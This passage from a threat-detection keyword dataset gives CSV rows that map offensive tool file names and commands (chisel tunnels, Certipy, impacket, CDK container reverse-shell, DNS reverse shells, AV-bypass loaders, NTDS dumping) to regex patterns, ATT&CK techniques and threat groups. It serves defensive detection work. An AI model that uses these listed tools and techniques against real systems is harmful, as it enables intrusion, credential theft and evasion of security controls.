BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","5961"
"*/cccam-version.nse*",".{0,1000}\/cccam\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5962"
"*/ccmpwn.git*",".{0,1000}\/ccmpwn\.git.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","5963"
"*/ccmpwn.py*",".{0,1000}\/ccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","5964"
"*/CCob/Volumiser*",".{0,1000}\/CCob\/Volumiser.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","5965"
"*/cdk_darwin_amd64*",".{0,1000}\/cdk_darwin_amd64.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","5966"
"*/cdk_linux_386*",".{0,1000}\/cdk_linux_386.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","5967"
"*/cdk_linux_amd64*",".{0,1000}\/cdk_linux_amd64.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","5968"
"*/cdk-fabric run reverse-shell*",".{0,1000}\/cdk\-fabric\srun\sreverse\-shell.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","5969"
"*/cdk-fabric run shim-pwn*",".{0,1000}\/cdk\-fabric\srun\sshim\-pwn.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","5970"
"*/CelestialSpark.git*",".{0,1000}\/CelestialSpark\.git.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","5971"
"*/cerbrutus*",".{0,1000}\/cerbrutus.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1110 - T1040 - T1496","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","N/A","4","385","57","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z","5972"
"*/Certify.exe*",".{0,1000}\/Certify\.exe.{0,1000}","offensive_tool_keyword","Certify","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","5973"
"*/Certify.exe*",".{0,1000}\/Certify\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","5974"
"*/Certipy.exe*",".{0,1000}\/Certipy\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5975"
"*/Certipy.git*",".{0,1000}\/Certipy\.git.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","1","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","5976"
"*/Certipy/*",".{0,1000}\/Certipy\/.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","1","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","5977"
"*/certipy64.exe*",".{0,1000}\/certipy64\.exe.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","1","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","5978"
"*/certs/dnsKIRE.local.crt*",".{0,1000}\/certs\/dnsKIRE\.local\.crt.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","5979"
"*/certs/dnsKIRE.local.key*",".{0,1000}\/certs\/dnsKIRE\.local\.key.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","5980"
"*/CertStealer*",".{0,1000}\/CertStealer.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1552.001 - T1140 - T1005 - T1649","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","10","5","487","68","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z","5981"
"*/certsync.git*",".{0,1000}\/certsync\.git.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","5982"
"*/cfn__resource_injection_lambda*",".{0,1000}\/cfn__resource_injection_lambda.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5983"
"*/ChaiLdr.exe*",".{0,1000}\/ChaiLdr\.exe.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","1","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","5984"
"*/ChaiLdr.git*",".{0,1000}\/ChaiLdr\.git.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","1","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","5985"
"*/ChainBuilder.py*",".{0,1000}\/ChainBuilder\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","5986"
"*/Chakra.dll*",".{0,1000}\/Chakra\.dll.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","N/A","10","3","N/A","N/A","N/A","N/A","5987"
"*/changepasswd.py*",".{0,1000}\/changepasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","#linux","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5988"
"*/ChannelLinter.exe*",".{0,1000}\/ChannelLinter\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","5989"
"*/ChannelLinter_d64.exe*",".{0,1000}\/ChannelLinter_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","5990"
"*/CHAOS.git*",".{0,1000}\/CHAOS\.git.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","5991"
"*/CHAOS-5.0.1.zip*",".{0,1000}\/CHAOS\-5\.0\.1\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","5992"
"*/chaos-container:/database/*",".{0,1000}\/chaos\-container\:\/database\/.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","5993"
"*/charlotte.cpp*",".{0,1000}\/charlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","5994"
"*/charlotte.py*",".{0,1000}\/charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","5995"
"*/chashell.git*",".{0,1000}\/chashell\.git.{0,1000}","offensive_tool_keyword","chashell","Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks","T1071.004 - T1572 - T1071 - T1027","TA0011 - TA0005 - TA0008","N/A","PYSA","C2","https://github.com/sysdream/chashell","1","1","N/A","N/A","10","10","1068","135","2022-04-05T17:22:14Z","2019-02-15T14:54:48Z","5996"
"*/CheckPort.exe*",".{0,1000}\/CheckPort\.exe.{0,1000}","offensive_tool_keyword","CheckPort","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","5997"
"*/CheckPort.exe*",".{0,1000}\/CheckPort\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","5998"
"*/CheckPort.exe*",".{0,1000}\/CheckPort\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","5999"
"*/checkRoot.ps1*",".{0,1000}\/checkRoot\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#linux","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","6000"
"*/CheckSMBSigning.git*",".{0,1000}\/CheckSMBSigning\.git.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","1","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","6001"
"*/CheckSMBSigning.ps1*",".{0,1000}\/CheckSMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","1","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","6002"
"*/CheeseTools.git*",".{0,1000}\/CheeseTools\.git.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","6003"
"*/cheetah.git*",".{0,1000}\/cheetah\.git.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","6004"
"*/cheetah.py*",".{0,1000}\/cheetah\.py.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","#linux","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","6005"
"*/Chimera.git*",".{0,1000}\/Chimera\.git.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","6006"
"*/chimera.py*",".{0,1000}\/chimera\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","6007"
"*/chimera.sh*",".{0,1000}\/chimera\.sh.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","6008"
"*/chisel.exe*",".{0,1000}\/chisel\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6009"
"*/chisel.git*",".{0,1000}\/chisel\.git.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6010"
"*/chisel/client/*",".{0,1000}\/chisel\/client\/.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6011"
"*/chisel/server/*",".{0,1000}\/chisel\/server\/.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6012"
"*/chisel@latest*",".{0,1000}\/chisel\@latest.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6013"
"*/chisel_x32*",".{0,1000}\/chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","6014"
"*/chisel_x64*",".{0,1000}\/chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","6015"
"*/chisel-darwin_amd64*",".{0,1000}\/chisel\-darwin_amd64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6016"
"*/chisel-freebsd*",".{0,1000}\/chisel\-freebsd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6017"
"*/chisel-linux_*",".{0,1000}\/chisel\-linux_.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6018"
"*/chisel-master*",".{0,1000}\/chisel\-master.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6019"
"*/chisel-windows_amd6*",".{0,1000}\/chisel\-windows_amd6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6020"
"*/chntpw -*",".{0,1000}\/chntpw\s\-.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6021"
"*/chntpw-140201*",".{0,1000}\/chntpw\-140201.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6022"
